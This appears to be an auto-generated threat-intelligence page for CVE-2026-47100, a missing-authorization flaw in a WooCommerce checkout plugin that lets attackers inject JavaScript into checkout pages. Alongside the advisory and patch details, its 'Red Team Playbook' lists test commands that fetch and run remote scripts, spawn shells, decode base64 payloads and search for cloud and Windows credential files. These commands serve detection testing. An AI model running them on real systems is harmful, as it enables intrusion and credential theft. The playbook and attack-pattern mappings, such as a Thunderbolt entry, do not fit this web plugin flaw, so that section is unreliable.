CVE-2026-47100
Overview
This vulnerability is a missing authorization flaw in the FunnelKit Funnel Builder for WooCommerce Checkout plugin prior to version 3.15.0.3. The root cause is the lack of access control on the public AJAX checkout endpoint, which permits unauthenticated requests to invoke internal methods. The affected component is the plugin's External Scripts global setting, which can be manipulated through this unauthorized access vector.
Vulnerability Description
Funnel Builder for WooCommerce Checkout prior to 3.15.0.3 contains a missing authorization vulnerability in the public checkout endpoint that allows unauthenticated attackers to invoke internal methods and write arbitrary data to the plugin's External Scripts global setting. Attackers can inject malicious JavaScript through the External Scripts setting that executes in the browsers of all checkout page visitors.
Impact
An unauthenticated attacker can inject arbitrary JavaScript into the External Scripts setting, resulting in script execution in the browsers of all checkout page visitors. This can lead to theft of sensitive customer data, session hijacking, or other client-side attacks. No authentication or user interaction is required to exploit this flaw, making it a high-risk vector for compromising customer trust and data confidentiality on e-commerce sites using the affected plugin.
Solution
Upgrade FunnelKit Funnel Builder for WooCommerce Checkout to version 3.15.0.3 or later, where the missing authorization checks on the AJAX checkout endpoint have been implemented. The patch is available in the WordPress plugin repository changelog at https://plugins.trac.wordpress.org/changeset/3530797/funnel-builder/tags/3.15.0.3/modules/checkouts/includes/class-wfacp-ajax-controller.php. Site administrators should apply this update promptly to mitigate the vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the Funnel Builder for WooCommerce Checkout prior to version 3.15.0.3 is characterized by a missing authorization check in the public checkout endpoint. This flaw allows unauthenticated attackers to access internal methods that should be restricted to authorized users. Specifically, the vulnerability permits the injection of arbitrary data into the plugin's External Scripts global setting. By exploiting this weakness, attackers can insert malicious JavaScript code that executes in the browsers of all visitors to the checkout page, leading to potential data theft, session hijacking, or other malicious activities.
Attack vectors for this vulnerability are primarily web-based, targeting the checkout functionality of e-commerce sites utilizing the affected plugin. An attacker could craft a specially designed HTTP request to the public checkout endpoint, bypassing any authentication mechanisms that are typically in place. Once the malicious script is injected, it can execute in the context of the user’s browser, allowing the attacker to perform actions such as capturing keystrokes, stealing cookies, or redirecting users to phishing sites. This exploitation can occur without any user interaction, making it particularly insidious as it can affect a wide range of users visiting the checkout page.
The real-world impact of this vulnerability is significant, especially for businesses relying on WooCommerce for online transactions. The injection of malicious JavaScript can lead to severe reputational damage, loss of customer trust, and potential financial losses due to fraud. Furthermore, if sensitive customer information is compromised, businesses may face legal repercussions and regulatory fines, particularly in jurisdictions with stringent data protection laws. The risk is amplified for e-commerce platforms, where the integrity of the checkout process is crucial for maintaining customer confidence and ensuring smooth transactions.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regular security audits and code reviews can help identify and rectify missing authorization checks in web applications. Additionally, employing web application firewalls (WAFs) can provide an additional layer of defense by filtering out malicious requests before they reach the application. It is also essential to keep all plugins and software components up to date, as developers often release patches to address known vulnerabilities. Educating users about the risks of executing scripts from untrusted sources can further reduce the likelihood of successful exploitation.
In conclusion, the missing authorization vulnerability in the Funnel Builder for WooCommerce Checkout poses a serious threat to e-commerce platforms. The potential for unauthorized access and script injection can lead to significant business risks, including financial loss and reputational damage. Organizations must prioritize the detection and mitigation of such vulnerabilities through proactive security measures, regular updates, and user education to safeguard their operations and customer data.
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2026-47100, indicating that attempts to exploit the missing authorization vulnerability in Funnel Builder for WooCommerce Checkout have become more frequent. This uptick in telemetry corresponds with the assignment of a high CVSS score, reflecting the growing recognition of the vulnerability’s potential impact. Although no new exploit techniques or proof-of-concept code have surfaced, the increased targeting suggests that threat actors are actively probing affected environments, raising the likelihood of successful compromise. The elevated EPSS score, while still low, signals an emerging risk that defenders must monitor closely. This shift underscores the urgency for organizations using the affected plugin to reassess their exposure, as the vulnerability’s capacity for injecting malicious scripts into checkout pages poses a direct threat to customer security and business integrity. Consequently, the overall threat level has escalated from theoretical to actively targeted, warranting heightened vigilance.
Update 2 — June 07, 2026
CSURFACE threat intelligence has identified a new development in the exploitation landscape of CVE-2026-47100 with the emergence of publicly available proof-of-concept exploit code on GitHub. This marks a significant shift from prior conditions where no such exploit tools were accessible, effectively lowering the barrier for threat actors to weaponize the vulnerability. Concurrently, our telemetry indicates a modest but meaningful increase in the Exploit Prediction Scoring System (EPSS) value, reflecting a growing likelihood of exploitation attempts in the wild. While the absolute EPSS remains low, the upward trend coupled with the availability of exploit code signals an evolving threat environment that demands closer scrutiny. This change elevates the risk posture from a primarily theoretical concern to one of active targeting, increasing the urgency for defenders to monitor for exploitation attempts. The capacity for attackers to inject malicious JavaScript into checkout pages now has a more tangible exploitation vector, heightening potential impacts on customer security and transactional integrity.
Affected Products
No CPE information available.
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
rootdirective-sec/CVE-2026-47100-Analysis-Lab
|
rootdirective-sec | 0 | 0 | 2026-05-28 | View |
Threat Feed
5 eventsSighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Sighting activity recorded
Active exploitation confirmed — vendor: FunnelKit, product: Funnel Builder for WooCommerce Checkout
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-665 | Exploitation of Thunderbolt Protection Flaws |
47%
|
Low | Very High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2026-47100 |
| sansec.io |
GitHub CVE
technical-description
|
https://sansec.io/research/funnelkit-woocommerce-vulnerability-exploited |
| plugins.trac.wordpress.org |
GitHub CVE
patch
|
https://plugins.trac.wordpress.org/changeset/3530797/funnel-builder/tags/3.15.0.3/modules/checkouts/includes/class-wfacp-ajax-controller.php |
| vulncheck.com |
GitHub CVE
third-party-advisory
|
https://www.vulncheck.com/advisories/funnel-builder-for-woocommerce-checkout-missing-authorization-via-ajax |